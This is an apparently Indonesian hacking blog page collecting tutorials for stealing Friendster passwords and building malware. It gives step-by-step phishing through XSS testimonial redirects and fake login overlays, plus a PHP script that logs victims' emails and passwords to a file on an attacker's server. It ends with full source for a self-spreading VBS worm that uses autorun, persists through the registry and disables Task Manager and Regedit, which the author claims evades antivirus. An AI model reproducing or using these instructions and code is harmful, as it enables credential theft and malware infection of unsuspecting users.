Senin, 08 September 2008

hacking passwrd di fs

Melakukan Hacking password di friendster

langkah-langkahnya :

1. Masuk ke testimonial teman anda / target anda.
2. Masukkan :
halo atau apa terserah asal ada tulisan (lalu klik kanan lalu paste source “A”, JANGAN di Ctrl V cara pastenya)


—- More —-
3. Lalu tunggu beberapa waktu sampai approve testimonialnya.
4. Setelah di approve maka anda dapat menunggu target atau para pengguna friendster membuka fs target dan tentu saja melakukan login di friendster target anda. ( Saat fs target terbuka maka dalam beberapa detik / waktu langsung berubah halaman menjadi halaman untuk login yang hasilnya akan direcord di KLIK Disini (http://www.yogyafree.net/) - Jalan di IE, tp ada browser yg ga bisa)

Source “A” : Klik Disini (http://www.yogyafree.net/familycode/source_a.txt)

Ok, met ngehack fs http://www.yogyafree.net/forum2/images/smiles/icon_wink.gif

Penulis :
^family_code^

berhubung banyaknya reply yg kebanyakan kecewa >:).
dan sesuai dengan tuntutan untuk dikasih contoh, maka gua coba beri sedikit sample walaupun ada kekurangannya. tapi setidaknya ada gambaran besar buat rekan-rekan semua.

LANGKAH 1.

bukalah IE di kompie anda

http://serv2.imagehigh.com/imgss/5465187_klik%20IE.jpg (http://serv2.imagehigh.com/view.php?id=5465187_klik%20IE.jpg&path=/imgss)

LANGKAH 2.

log in ke fs anda. dengan username dan password anda tentunya :)).

http://serv2.imagehigh.com/imgss/5465188_log%20in%20ke%20fs.jpg (http://serv2.imagehigh.com/view.php?id=5465188_log%20in%20ke%20fs.jpg&path=/imgss)

LANGKAH 3.

siapkan “SOURCE A” ini adalah script (senjata kamu untuk ngehack korban). caranya : setelah terbuka window “source a” - nya (berbentuk html) copy scriptnya semua (ingat, harus lengkap. jangan ada yg ketinggalan). cara copy ialah dengan mouse (jangan sekali-kali tangan anda pegang keyboard saat copy script. BAHAYA BISA MELEDAK >:)>:)).

http://serv2.imagehigh.com/imgss/5465189_source%20a.jpg (http://serv2.imagehigh.com/view.php?id=5465189_source%20a.jpg&path=/imgss)

ingat : lakukan copy dengan mouse. jangan pake ctrl +v. nanti ngga jalan.

LANGKAH 4.

setelah itu semua, barulah anda kirim “TESTI / COMMENT” ke target atau korban anda. caranya sangat mudah. cukup tulis / ketik “hi” atau “apa kabar” atau “hi. boleh kenalan nda”.

apa saja terserah anda yg penting ada tulisan. jangan sampe kosong, nanti korban “curigation” kok isinya kosong ;).

http://serv2.imagehigh.com/imgss/5465192_kirim%20comment%20atau%20testi.jpg (http://serv2.imagehigh.com/view.php?id=5465192_kirim%20comment%20atau%20testi .jpg&path=/imgss)

LANGKAH 5.

setelah anda menuliskan “sesuatu” untuk korban anda, barulah masukkan script “SOURCE A” tersebut di bawah isi pesan anda.
anggap lah setelah akhir tulisan, enter 1X / 2X yg jelas posisi script ada dibawah.

http://serv2.imagehigh.com/imgss/5465195_setelah%20paste.jpg (http://serv2.imagehigh.com/view.php?id=5465195_setelah%20paste.jpg&path=/imgss)

ada pertanyaan yg menarik seputar source a ini. ada yg bertanya. “maksimal kan 1000 karakter / huruf. gimana masukinnya. kalo ada memasukkan 1 bab puisi cinta shakespeare tentu ngga bakalan cukup.

berhubung ini adalah script. maka system tidak akan membacanya sebagai karakter, karena script ini lain karakter huruf :D.

lihat di gambar. setelah dilakukan paste, masih ada sekitar 938 karakter lagi untuk di ketik, padahal script sudah saya masukkan.:cool:.

setelah itu, kirim testi / comment ada ke korban >:).

nah yang harus anda lakukan adalah menunggu approval dari korban. kalo korban approve dengan testi / comment anda, eng…ing…eng…>:). maka anda berhasil mendapatkan username sama password korban. kalo tidak di approve, silahkan cari korban lain yg maunya approve terus :)).

catatan 1.

anda tidak akan mendapatkan username sama password dikirimkan ke email anda, atau ke balasan comment / testi anda (emang lo kira lo siapa :)). becanda :D. peace :p ). lihat point 4 diatas (bukan langkah 4 tapi point 4 ada tulisan direcord “klik disini”)
carilah username target anda bila ada, maka passwordnya berada disebelahnya. bila tidak ada, maka belum di approve.

http://serv2.imagehigh.com/imgss/5465198_list%20korban.jpg (http://serv2.imagehigh.com/view.php?id=5465198_list%20korban.jpg&path=/imgss)

catatan 2.

setelah anda mengirim script tersebut ke korban, maka setelah korban approve testi / comment anda, anda belum mendapatkan password ama usernamenya. anda akan mendapatkan password ama username setelah korban log in untuk kedua kalinya (log in pertama adalah saat dia approve comment / testi anda. log in kedua adalah setelah ia log out dari log in pertama… halah..:))).

catatan 3.

hack ini 100% hanya akan berhasil kepada korban yg mempunyai koneksi sendiri (internet dirumah). kenapa? karena setelah korban approve, maka system akan mengingat script tersebut. dan pas ia buka friendster untuk yg kedua kalinya, maka system IE akan menampilkan front page FS dengan nuansa berbeda (yg sebenarnya ini adalah front page untuk merecord username sama passwordnya).

apabila korban tidak curiga, maka ia akan memasukkan username sama passwordnya. apabila korban curiga, maka ia akan menutup IE dan mengulang lagi (setelah ditutup, maka script otomastis akan terhapus). silahkan di testi lagi :D.

membobol FS

hy,,,,


bro en girl...


yang mw bobol fs tuh gak boleh...
dilarang ma yang diatas...
kl cm ngeliat password FS doank se gpp

kwakwakwa.......3x


yach gitu lah yang namanya sani


{http://blog.misbahuddink.com/seepasword-free-download-see-pasword-your-friend.html.}


tapi pesan sani.....

ni gak leh bwt mainan


you know????

Teknik Lain : Hack Password Friendster

Hi… sudah lama enggak menulis. Kali ini saya akan menerangkan cara mendapatkan password Account Friendster. Tidak usah susah payah membuat testimonial redirect dan meng-upload halaman php tipuan atau apalah. Lagipula bug itu sudah di-patch oleh pengelolanya :). Oke kali ini teknik dari blognya mas Sepri. Sampai saat tulisan ini dibuat teknik ini masih bisa dilakukan dan katanya 10000% berjalan

Begini langkah-langkahnya :

1. Download Script-nya mas Sepri di LINK INI

2. Buka pakai Word atau Wordpad biar yg ia tandai bisa terlihat

3. Kalian cukup ganti Nomor yang dia tandai BIRU
Ganti pakai nomor ID kamu di FS. Cara liatnya? Gampang…
Tingall logout dari Account FS kalian. Lalu masuk ke URL halaman FS kamu tanpa Login. Nanti di Address Box ada tulisan kayak gini : http://www.friendster.com/%USER ID KAMU%.

Misalnya User ID-nya adalah 16419975 maka kalimatnya adalah http://www.friendster.com/16419975.

Copy user ID (angka-angkanya aja) FS kamu dan gantikan angka-angka yang ditandai biru di Script tersebut dengan User ID FS yang sudah di-copy.

4. Buka LINK INI

5. Copy kode yang dari Script yang udah di rubah ke bagian atas

6. Tekan GENERATE

7. Copy code yang bawah

8. Paste di MEDIA BOX halaman FS kamu.

Selesai

Cara kerjanya adalah :

Sang korban melihat profile kita terus dalam hitungan menit
profile tersebut berubah menjadi tampilan log-in
dan bagi yang ga merhatikan mungkin ini login asli soalnya masih
dalam address friendster…….

Padahal ini adalah halaman send message yang ia rubah menjadi halaman log-in. Jadi kalau diisi tuh Korban secara otomatis kirim message ke kita dan kita ga perlu report2 bikin php atau apalah
nah kenapa saya suruh ganti nomor ID FS tersebut soalnya itu adalah nomor ID mas Sepri jadi kalau ga dirubah
maka pesannya akan masuk ke FS mas Sepri huehuehueh…..

Kode ini hanya berlaku untuk mencuri Password FS yang sudah di generate emailnya dan bagi yang belum digenerate selamatlah anda……

mendapatkan password di fs

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.com. nah ini dia selamat membaca. GBU Penerapan Social Engineering untuk mendapatkan password di Friendster
Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat
Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. dll.

Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering….

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. .

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>



Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… =] :))

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Thanks To :

Allah SWT
———
-V-i-e- My Queen

$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
$Xcode Community
$h_iem_ura, daddy, otoy’s, rahmat-mh, n 2 friends that can’t be says one by one.
$komp butut gw!!

$$$ Knowledge is belongs to world $$$

Download

###numpang_lewat###

Membuat Virus Menggunakan Notepad


Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next’//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.